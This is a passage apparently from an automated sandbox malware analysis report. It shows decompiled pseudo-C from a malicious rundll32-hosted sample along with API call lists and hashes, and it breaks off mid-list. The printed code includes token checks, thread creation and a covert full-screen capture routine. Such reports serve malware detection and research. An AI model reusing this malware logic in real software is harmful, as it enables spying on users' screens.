					_t28 = E0346FCDA(E0346109A(_t41));
					_a8 = _t28;
					__eflags = _t28;
					if(_t28 != 0) {
						_t48 = 0x54;
						 *0x347f8e0 = E0346F0D9(0x347cbf0, _t48);
						E0346647A(_t48, __eflags);
						E03468DDF( &_a8, 0xfffffffe);
						_t36 =  *0x347f8d0; // 0x50ff8c0
						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x641);
					}
					_v8 = 0;
					_t31 = CreateThread(0, 0, E034663A2, 0, 0,  &_v8);
					 *0x347f8f4 = _t31;
					__eflags = _t31;
					if(_t31 == 0) {
						goto L3;
					} else {
						goto L7;
					}
				}
				E03468D9A();
				goto L3;
			}













            0x03466606
            0x0346660b
            0x034666ef
            0x034666f3
            0x034666e8
            0x034666ea
            0x00000000
            0x034666ea
            0x034666f5
            0x034666ff
            0x0346666a
            0x00000000
            0x0346666a
            0x03466611
            0x03466616
            0x0346661f
            0x03466624
            0x0346662e
            0x0346663f
            0x03466644
            0x0346664b
            0x03466650
            0x03466652
            0x03466655
            0x03466661
            0x03466662
            0x0346666e
            0x03466673
            0x03466682
            0x03466687
            0x0346668a
            0x0346668c
            0x03466695
            0x034666a0
            0x034666a5
            0x034666b0
            0x034666b5
            0x034666bf
            0x034666bf
            0x034666d9
            0x034666dc
            0x034666df
            0x034666e4
            0x034666e6
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x034666e6
            0x03466664
            0x00000000

            APIs
              • Part of subcall function 03468DB4: HeapCreate.KERNELBASE(00000000,00096000,00000000,03466616), ref: 03468DBD
              • Part of subcall function 0346F0D9: GetModuleHandleA.KERNEL32(00000000,?,?,?,0347CA88,?,0346663F,?), ref: 0346F0FB
            • GetFileAttributesW.KERNELBASE(00000000), ref: 03466655
            • CreateThread.KERNELBASE(00000000,00000000,034663A2,00000000,00000000,?), ref: 034666DC
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: Create$AttributesFileHandleHeapModuleThread
            • String ID:
            • API String ID: 607385197-0
            • Opcode ID: e47bcd166e60a64c326c5430db0f3d95d1abee81c23bfb18dbac65b8aeeb7551
            • Instruction ID: d9f3967a2eed960e282b0216a62ec0b52a4b4b1dcdad273d0760e429388e9dc6
            • Opcode Fuzzy Hash: e47bcd166e60a64c326c5430db0f3d95d1abee81c23bfb18dbac65b8aeeb7551
            • Instruction Fuzzy Hash: C5212F75604305AFDB04FFB6E804A6E37E8AF44310F16852FE559DE294DB78C5448B2A
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0346F0D9 Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 329 346f0d9-346f0f9 call 3469f6b 332 346f103-346f108 LoadLibraryA 329->332 333 346f0fb-346f101 GetModuleHandleA 329->333 334 346f10a-346f10c 332->334 333->334 335 346f10e-346f113 call 346f08e 334->335 336 346f11b-346f129 call 3468d87 334->336 339 346f118-346f119 335->339 339->336
            C-Code - Quality: 47%
            			E0346F0D9(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E03469F6B(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0xf2e) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E0346F08E(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E03468D87( &_v8);
				return _t25;
			}










            0x0346f0dc
            0x0346f0df
            0x0346f0e5
            0x0346f0e7
            0x0346f0ec
            0x0346f0ee
            0x0346f0f8
            0x0346f0f9
            0x0346f108
            0x0346f0fb
            0x0346f0fb
            0x0346f0fb
            0x0346f10c
            0x0346f113
            0x0346f119
            0x0346f119
            0x0346f11e
            0x0346f129

            APIs
            • GetModuleHandleA.KERNEL32(00000000,?,?,?,0347CA88,?,0346663F,?), ref: 0346F0FB
            • LoadLibraryA.KERNELBASE(00000000,?,?,?,0347CA88,?,0346663F,?), ref: 0346F108
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: HandleLibraryLoadModule
            • String ID:
            • API String ID: 4133054770-0
            • Opcode ID: d4ae5de34469c5d22a5fd732a95993a6fd62ee98f45d9e95d5095fa0c4ca18b5
            • Instruction ID: 4c17af39bc691b5d551df6a2dc8e775c3ccec4a8d83f91e9288fef382d42ac00
            • Opcode Fuzzy Hash: d4ae5de34469c5d22a5fd732a95993a6fd62ee98f45d9e95d5095fa0c4ca18b5
            • Instruction Fuzzy Hash: 4CF0A072300214AFC704EFAAE8448AAB3FDAF88291B14413FF402DF240DFB08D4587A5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0346CA5A Relevance: 1.6, APIs: 1, Instructions: 82COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 341 346ca5a-346ca79 call 346c92f 344 346cb14-346cb17 341->344 345 346ca7f-346ca96 call 346c986 341->345 348 346caf6-346cb04 FindCloseChangeNotification 345->348 349 346ca98-346cab9 345->349 350 346cb06-346cb11 call 3468ddf 348->350 351 346cb12 348->351 349->348 355 346cabb-346cabd 349->355 350->351 351->344 356 346cabf-346cac2 355->356 357 346cae9-346caf4 355->357 358 346cac5-346cad4 356->358 357->348 361 346cae6-346cae8 358->361 362 346cad6-346cae2 358->362 361->357 362->358 363 346cae4 362->363 363->357
            C-Code - Quality: 47%
            			E0346CA5A(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E0346C92F(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E0346C986(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						FindCloseChangeNotification(_v16);
						if(_t48 != 0) {
							E03468DDF( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x347f8d8; // 0x50ffab0
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x347f8d8; // 0x50ffab0
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x347f8d8; // 0x50ffab0
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}




















            0x0346ca61
            0x0346ca63
            0x0346ca6a
            0x0346ca6c
            0x0346ca6f
            0x0346ca74
            0x0346ca79
            0x0346ca83
            0x0346ca86
            0x0346ca89
            0x0346ca8e
            0x0346ca90
            0x0346ca96
            0x0346caf6
            0x0346cafe
            0x0346cb04
            0x0346cb0b
            0x0346cb11
            0x00000000
            0x0346cb12
            0x0346ca9b
            0x0346ca9c
            0x0346ca9d
            0x0346ca9e
            0x0346ca9f
            0x0346caa0
            0x0346caa1
            0x0346caa2
            0x0346caa7
            0x0346caa9
            0x0346caae
            0x0346caaf
            0x0346cab9
            0x00000000
            0x00000000
            0x0346cabd
            0x0346cae9
            0x0346cae9
            0x0346caf1
            0x0346caf4
            0x00000000
            0x0346caf4
            0x0346cabf
            0x0346cabf
            0x0346cac2
            0x0346cac5
            0x0346cac5
            0x0346cac8
            0x0346caca
            0x0346cad4
            0x00000000
            0x00000000
            0x0346cad9
            0x0346cada
            0x0346cadd
            0x0346cae2
            0x00000000
            0x00000000
            0x00000000
            0x0346cae4
            0x0346cae8
            0x00000000
            0x0346cae8
            0x0346cb17

            APIs
              • Part of subcall function 0346C92F: GetCurrentThread.KERNEL32 ref: 0346C942
              • Part of subcall function 0346C92F: OpenThreadToken.ADVAPI32(00000000,?,?,0346CA74,00000000,03460000), ref: 0346C949
              • Part of subcall function 0346C92F: GetLastError.KERNEL32(?,?,0346CA74,00000000,03460000), ref: 0346C950
              • Part of subcall function 0346C92F: OpenProcessToken.ADVAPI32(00000000,?,?,0346CA74,00000000,03460000), ref: 0346C975
              • Part of subcall function 0346C986: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,03460000,00000000,00000000,?,0346CA07,00000000,00000000,?,0346CA30), ref: 0346C9A1
              • Part of subcall function 0346C986: GetLastError.KERNEL32(?,0346CA07,00000000,00000000,?,0346CA30,00001644,?,0346E053), ref: 0346C9A8
            • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,03460000), ref: 0346CAFE
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
            • String ID:
            • API String ID: 1806447117-0
            • Opcode ID: e6ce40138d7073575f29f07de60f60ae4c433665b20030a31fa5383b6ed86916
            • Instruction ID: fe1dbd3850d3535b3f820e6ebc51c9c27d30a4bc8fcfebb7739232e48b5f1369
            • Opcode Fuzzy Hash: e6ce40138d7073575f29f07de60f60ae4c433665b20030a31fa5383b6ed86916
            • Instruction Fuzzy Hash: FC217C32A00209AFCB10EFA9DCC4AAFF7F8FF48600B14406AE541EB251E7309D059B55
            Uniqueness

            Uniqueness Score: -1.00%

            Function 034663A2 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 364 34663a2-34663bb call 346651e GetOEMCP call 346dfc2 369 34663c0-34663eb call 3473c36 364->369 370 34663bd-34663be 364->370 374 34663f5-34663fb call 346d889 369->374 375 34663ed-34663f3 369->375 371 3466435 370->371 378 3466400-3466407 374->378 376 346640f-346641b 375->376 379 346642d call 3463597 376->379 380 346641d-3466422 call 34661e8 376->380 383 3466424-346642b 378->383 384 3466409 378->384 386 3466432-3466434 379->386 380->386 383->379 383->386 384->376 386->371
            C-Code - Quality: 100%
            			E034663A2(void* __fp0) {
				void* __ecx;
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				intOrPtr _t17;
				intOrPtr _t20;
				void* _t25;
				void* _t27;

				_t32 = __fp0;
				E0346651E();
				GetOEMCP();
				_t13 = E0346DFC2(__fp0); // executed
				 *0x347f8d4 = _t13;
				if(_t13 != 0) {
					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
					_t14 =  *0x347f8d4; // 0x50ffc00
					_t2 = _t14 + 0x224; // 0x3460000
					E03473C36( *_t2);
					_t26 =  *0x347f8d4; // 0x50ffc00
					_t25 = _t27;
					__eflags =  *(_t26 + 0x1898) & 0x00010000;
					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
						_t7 = _t26 + 0x224; // 0x3460000, executed
						_t26 =  *_t7;
						_t16 = E0346D889( *_t7); // executed
						__eflags = _t16;
						_t17 =  *0x347f8d4; // 0x50ffc00
						if(_t16 != 0) {
							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
								L10:
								__eflags = 0;
								return 0;
							}
							L9:
							E03463597();
							goto L10;
						}
						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
						L6:
						_t20 =  *0x347f8d4; // 0x50ffc00
						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
						if(__eflags == 0) {
							goto L9;
						}
						E034661E8(_t25, _t26, __eflags, _t32);
						goto L10;
					}
					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
					goto L6;
				}
				return _t13 + 1;
			}











            0x034663a2
            0x034663a2
            0x034663a7
            0x034663ae
            0x034663b3
            0x034663bb
            0x034663c4
            0x034663ca
            0x034663cf
            0x034663d5
            0x034663da
            0x034663e0
            0x034663e1
            0x034663eb
            0x034663f5
            0x034663f5
            0x034663fb
            0x03466400
            0x03466402
            0x03466407
            0x03466424
            0x0346642b
            0x03466432
            0x03466432
            0x00000000
            0x03466434
            0x0346642d
            0x0346642d
            0x00000000
            0x0346642d
            0x03466409
            0x0346640f
            0x0346640f
            0x03466414
            0x0346641b
            0x00000000
            0x00000000
            0x0346641d
            0x00000000
            0x0346641d
            0x034663ed
            0x00000000
            0x034663ed
            0x00000000

            APIs
            • GetOEMCP.KERNEL32 ref: 034663A7
              • Part of subcall function 0346DFC2: GetCurrentProcessId.KERNEL32 ref: 0346DFE9
              • Part of subcall function 0346DFC2: GetLastError.KERNEL32 ref: 0346E0E3
              • Part of subcall function 0346DFC2: GetSystemMetrics.USER32(00001000), ref: 0346E0F3
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: CurrentErrorLastMetricsProcessSystem
            • String ID:
            • API String ID: 1196160345-0
            • Opcode ID: 6fc3314a8dc6a6d4a580e36b2199514fa486c8cba8eb165a104f329a9d89e210
            • Instruction ID: 7612e323bb93f6745c37f366bdc11c1ebaa393e68dddfa8bbff91c85f42b0d24
            • Opcode Fuzzy Hash: 6fc3314a8dc6a6d4a580e36b2199514fa486c8cba8eb165a104f329a9d89e210
            • Instruction Fuzzy Hash: 30012C796042928FC214FF69E5086A677E8EF49210F1F01BBE0449E115C7344455CB9B
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0346CA0A Relevance: 1.5, APIs: 1, Instructions: 34COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0346CA0A(void* __ecx) {
				signed int _v8;
				intOrPtr _t12;
				void* _t13;
				void* _t14;
				void* _t17;
				intOrPtr _t18;
				void* _t23;

				_v8 = _v8 & 0x00000000;
				_t12 =  *0x347f8d8; // 0x50ffab0
				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
				if(_t13 != 0) {
					_t14 = E0346C9F3(); // executed
					_t23 = _t14;
					if(_t23 != 0) {
						FindCloseChangeNotification(_v8);
						_t17 = _t23;
					} else {
						if(_v8 != _t14) {
							_t18 =  *0x347f8d0; // 0x50ff8c0
							 *((intOrPtr*)(_t18 + 0x30))(_v8);
						}
						_t17 = 0;
					}
					return _t17;
				} else {
					return _t13;
				}
			}










            0x0346ca0e
            0x0346ca16
            0x0346ca1e
            0x0346ca23
            0x0346ca2b
            0x0346ca30
            0x0346ca34
            0x0346ca52
            0x0346ca55
            0x0346ca36
            0x0346ca39
            0x0346ca3b
            0x0346ca43
            0x0346ca43
            0x0346ca46
            0x0346ca46
            0x0346ca59
            0x0346ca26
            0x0346ca26
            0x0346ca26

            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: bc85074d94ef5c3a652cf92ae8df896d5684a371bb60ff9658bc33828248ce38
            • Instruction ID: c68055bf7ad9cc9429659de1c2dbac5b2a212a8d180cfac376ce689b8f942cda
            • Opcode Fuzzy Hash: bc85074d94ef5c3a652cf92ae8df896d5684a371bb60ff9658bc33828248ce38
            • Instruction Fuzzy Hash: 0DF01731A10214EFCB10EBA8C985A9E73E8FF08245F0540A5E541EB250D774DE04DB95
            Uniqueness

            Uniqueness Score: -1.00%

            Function 03466438 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E03466438() {
				intOrPtr _t3;

				_t3 =  *0x347f8d0; // 0x50ff8c0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x347f8f4, 0xffffffff);
				ExitProcess(0);
			}




            0x03466438
            0x03466445
            0x0346644f

            APIs
            • ExitProcess.KERNEL32(00000000), ref: 0346644F
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: ExitProcess
            • String ID:
            • API String ID: 621844428-0
            • Opcode ID: 6845f78150d981f3ade8e6792fe2fabd27a764f57f6e30d8c36b769aa6903b1b
            • Instruction ID: 5c8f7f13dcd26599ae5897843cef8cf89485a52063c546bf2a46e45d818dc0ca
            • Opcode Fuzzy Hash: 6845f78150d981f3ade8e6792fe2fabd27a764f57f6e30d8c36b769aa6903b1b
            • Instruction Fuzzy Hash: 89C002712181519FC740BB64D949F1437E0BF0C322F1A86A5F529AE1EDCB2094289B00
            Uniqueness

            Uniqueness Score: -1.00%

            Function 03468DC9 Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E03468DC9(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x347f9b8, 8, _a4); // executed
				return _t2;
			}




            0x03468dd7
            0x03468dde

            APIs
            • RtlAllocateHeap.NTDLL(00000008,?,?,03469793,00000100,?,0346661B), ref: 03468DD7
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 2973a14fcd905f5d1d5cb28a5f00a8107de92cdee4637c3cb9637df70d70bf6b
            • Instruction ID: 5a21460218081e35e25e7a26fcaaf05002b4332e67800d729e9377218556cdec
            • Opcode Fuzzy Hash: 2973a14fcd905f5d1d5cb28a5f00a8107de92cdee4637c3cb9637df70d70bf6b
            • Instruction Fuzzy Hash: EAB0923A090208BBCF512A81EC05A847FA9FB08651F004010F6086C0648B6364659B80
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0346DADC Relevance: 1.5, APIs: 1, Instructions: 7threadCOMMON
            Download Yara Rule
            C-Code - Quality: 58%
            			E0346DADC(void* __ecx) {
				signed int _t4;

				_t4 = ResumeThread( *(__ecx + 4));
				asm("sbb eax, eax");
				return  ~_t4 & 0x00000001;
			}




            0x0346dae4
            0x0346daec
            0x0346daf1

            APIs
            • ResumeThread.KERNELBASE(?,0346D947,?,?,00000001), ref: 0346DAE4
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: ResumeThread
            • String ID:
            • API String ID: 947044025-0
            • Opcode ID: 14d0d73895b0cf1675e30319ee5a136cba5af4d624810a986250008a8b356604
            • Instruction ID: cb6bceb91d50815a1566ee617eee34f54139d284fd9c0417b3784dec1ae496eb
            • Opcode Fuzzy Hash: 14d0d73895b0cf1675e30319ee5a136cba5af4d624810a986250008a8b356604
            • Instruction Fuzzy Hash: 84B092322A00019BCB006B74D80A9A03BE0BB5A606B99C2E4A015CA065C32AC4598B40
            Uniqueness

            Uniqueness Score: -1.00%

            Function 03468DB4 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E03468DB4() {
				void* _t1;

				_t1 = HeapCreate(0, 0x96000, 0); // executed
				 *0x347f9b8 = _t1;
				return _t1;
			}




            0x03468dbd
            0x03468dc3
            0x03468dc8

            APIs
            • HeapCreate.KERNELBASE(00000000,00096000,00000000,03466616), ref: 03468DBD
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: CreateHeap
            • String ID:
            • API String ID: 10892065-0
            • Opcode ID: cc1cf0982644e22e81413323b3fa43a0c3a6321049242080f1d7b38d92e80143
            • Instruction ID: 86570de871f121843432171a75b6a6d257e6576e9366da7f41bb4e90bbf0b69b
            • Opcode Fuzzy Hash: cc1cf0982644e22e81413323b3fa43a0c3a6321049242080f1d7b38d92e80143
            • Instruction Fuzzy Hash: 6DB012B06A5300A6DB502B205C46B0075906344B02F200009B709BC1C8C7B010009D14
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0346DAF2 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
            Download Yara Rule
            C-Code - Quality: 91%
            			E0346DAF2(void* __ecx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t26;
				signed int _t28;
				signed int* _t36;
				signed int* _t39;

				_push(__ecx);
				_push(__ecx);
				_t36 = _a8;
				_t28 = _t36[1];
				if(_t28 != 0) {
					_t39 = _t36[2];
					do {
						_a8 = _a8 & 0x00000000;
						if(_t39[2] > 0) {
							_t31 = _t39[3];
							_t22 = _a4 + 0x24;
							_v12 = _a4 + 0x24;
							_v8 = _t39[3];
							while(E0346A236(_t22,  *_t31) != 0) {
								_t26 = _a8 + 1;
								_t31 = _v8 + 4;
								_a8 = _t26;
								_t22 = _v12;
								_v8 = _v8 + 4;
								if(_t26 < _t39[2]) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t36 =  *_t36 |  *_t39;
						}
						L8:
						_t39 =  &(_t39[4]);
						_t28 = _t28 - 1;
					} while (_t28 != 0);
				}
				Sleep(0xa);
				return 1;
			}









            0x0346daf5
            0x0346daf6
            0x0346daf9
            0x0346dafc
            0x0346db01
            0x0346db04
            0x0346db07
            0x0346db07
            0x0346db0f
            0x0346db14
            0x0346db17
            0x0346db1a
            0x0346db1d
            0x0346db20
            0x0346db33
            0x0346db34
            0x0346db37
            0x0346db3d
            0x0346db40
            0x0346db43
            0x00000000
            0x00000000
            0x0346db45
            0x00000000
            0x0346db43
            0x0346db49
            0x0346db49
            0x0346db4b
            0x0346db4b
            0x0346db4e
            0x0346db4e
            0x0346db53
            0x0346db5b
            0x0346db67

            APIs
            • Sleep.KERNELBASE(0000000A), ref: 0346DB5B
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: Sleep
            • String ID:
            • API String ID: 3472027048-0
            • Opcode ID: 47b18520b24951f1a71ac803e055ea8a055cb344e2d463482a3e54f886578df6
            • Instruction ID: 0bd902489928a4de862ebcbeee4cab67f335378600fc4a2e5fdceefff2900d69
            • Opcode Fuzzy Hash: 47b18520b24951f1a71ac803e055ea8a055cb344e2d463482a3e54f886578df6
            • Instruction Fuzzy Hash: 32112D71A00705AFDB14CF99C484AAAB7F8FF4A724F14846EE95ADB304D370E941CB55
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Function 03465D1E Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 223windowCOMMON
            Download Yara Rule
            C-Code - Quality: 98%
            			E03465D1E(int* __ecx) {
				signed int _v8;
				char _v12;
				int _v16;
				struct HWND__* _v20;
				struct HWND__* _v24;
				struct HDC__* _v28;
				void* _v32;
				int* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				short _v82;
				short _v84;
				signed int _v88;
				signed int _v92;
				struct tagBITMAPINFO _v96;
				intOrPtr _v102;
				int _v110;
				char _v112;
				void* _v116;
				void* _v120;
				void* _v124;
				void* _v132;
				void* _v136;
				void* _v140;
				int _v156;
				signed int _v160;
				void _v164;
				int _t82;
				void* _t84;
				signed int _t92;
				void* _t99;
				char _t103;
				intOrPtr _t113;
				int* _t114;
				struct HDC__* _t120;
				signed int _t124;
				short _t137;
				struct HDC__* _t141;
				void* _t144;
				void* _t148;

				_v36 = __ecx;
				_v24 = 0;
				_t120 = 0;
				_v12 = 0;
				_t144 = 0;
				_v20 = 0;
				_t141 = GetDC(0);
				_v28 = _t141;
				if(_t141 != 0) {
					_t120 = CreateCompatibleDC(_t141);
					if(_t120 != 0) {
						_v8 = GetDeviceCaps(_t141, 8);
						_t82 = GetDeviceCaps(_t141, 0xa);
						_v16 = _t82;
						_t144 = CreateCompatibleBitmap(_t141, _v8, _t82);
						if(_t144 != 0) {
							_t84 = SelectObject(_t120, _t144);
							_v32 = _t84;
							if(_t84 != 0) {
								_t144 = SelectObject(_t120, _v32);
								if(_t144 != 0) {
									GetObjectW(_t144, 0x18,  &_v164);
									_t92 = _v160;
									_t124 = _v156;
									_v92 = _t92;
									_v84 = 1;
									_t137 = 0x20;
									_v82 = _t137;
									_v96.bmiHeader = 0x28;
									_v80 = 0;
									_v76 = 0;
									_v72 = 0;
									_v68 = 0;
									_v64 = 0;
									_v60 = 0;
									asm("cdq");
									_v88 = _t124;
									_v8 = ((_t92 << 5) + 0x1f >> 5) * _t124 << 2;
									_t99 = E03468DC9(((_t92 << 5) + 0x1f >> 5) * _t124 << 2);
									_v20 = _t99;
									if(_t99 != 0) {
										GetDIBits(_t120, _t144, 0, _v156, _t99,  &_v96, 0);
										_v16 = _v8 + 0x36;
										_t103 = E03468DC9(_v8 + 0x36);
										_v12 = _t103;
										if(_t103 != 0) {
											_v110 = _v16;
											_v112 = 0x4d42;
											_v102 = 0x36;
											E03468EA6(_t103,  &_v112, 0xe);
											E03468EA6(_v12 + 0xe,  &_v96, 0x28);
											E03468EA6(_v12 + 0x36, _v20, _v8);
											_t148 = _t148 + 0x24;
											_v8 = _v8 & 0x00000000;
											_t113 = E0346FBFB(_v12, _v16,  &_v8);
											_v24 = _t113;
											if(_t113 != 0) {
												_t114 = _v36;
												if(_t114 != 0) {
													 *_t114 = _v8;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				E03468DDF( &_v20, 0);
				E03468DDF( &_v12, 0);
				if(_t120 != 0) {
					DeleteDC(_t120);
				}
				if(_t141 != 0) {
					DeleteDC(_t141);
				}
				if(_t144 != 0) {
					DeleteObject(_t144);
				}
				return _v24;
			}




















































            0x03465d2a
            0x03465d30
            0x03465d33
            0x03465d35
            0x03465d38
            0x03465d3a
            0x03465d43
            0x03465d45
            0x03465d4a
            0x03465d57
            0x03465d5b
            0x03465d6f
            0x03465d72
            0x03465d78
            0x03465d82
            0x03465d86
            0x03465d8e
            0x03465d94
            0x03465d99
            0x03465e2f
            0x03465e33
            0x03465e43
            0x03465e49
            0x03465e51
            0x03465e58
            0x03465e5b
            0x03465e64
            0x03465e65
            0x03465e6e
            0x03465e75
            0x03465e78
            0x03465e7b
            0x03465e7e
            0x03465e81
            0x03465e84
            0x03465e87
            0x03465e8b
            0x03465e9a
            0x03465e9d
            0x03465ea2
            0x03465ea8
            0x03465ebf
            0x03465ecc
            0x03465ecf
            0x03465ed4
            0x03465eda
            0x03465edf
            0x03465ee7
            0x03465ef2
            0x03465ef9
            0x03465f0e
            0x03465f23
            0x03465f31
            0x03465f34
            0x03465f39
            0x03465f3e
            0x03465f44
            0x03465f46
            0x03465f4b
            0x03465f50
            0x03465f50
            0x03465f4b
            0x03465f44
            0x03465eda
            0x03465ea8
            0x03465e33
            0x03465d99
            0x03465d86
            0x03465d5b
            0x03465f58
            0x03465f63
            0x03465f6d
            0x03465f70
            0x03465f70
            0x03465f78
            0x03465f7b
            0x03465f7b
            0x03465f83
            0x03465f86
            0x03465f86
            0x03465f93

            APIs
            • GetDC.USER32(00000000), ref: 03465D3D
            • CreateCompatibleDC.GDI32(00000000), ref: 03465D51
            • GetDeviceCaps.GDI32(00000000,00000008), ref: 03465D6A
            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 03465D72
            • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 03465D7C
            • SelectObject.GDI32(00000000,00000000), ref: 03465D8E
            • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 03465DB2
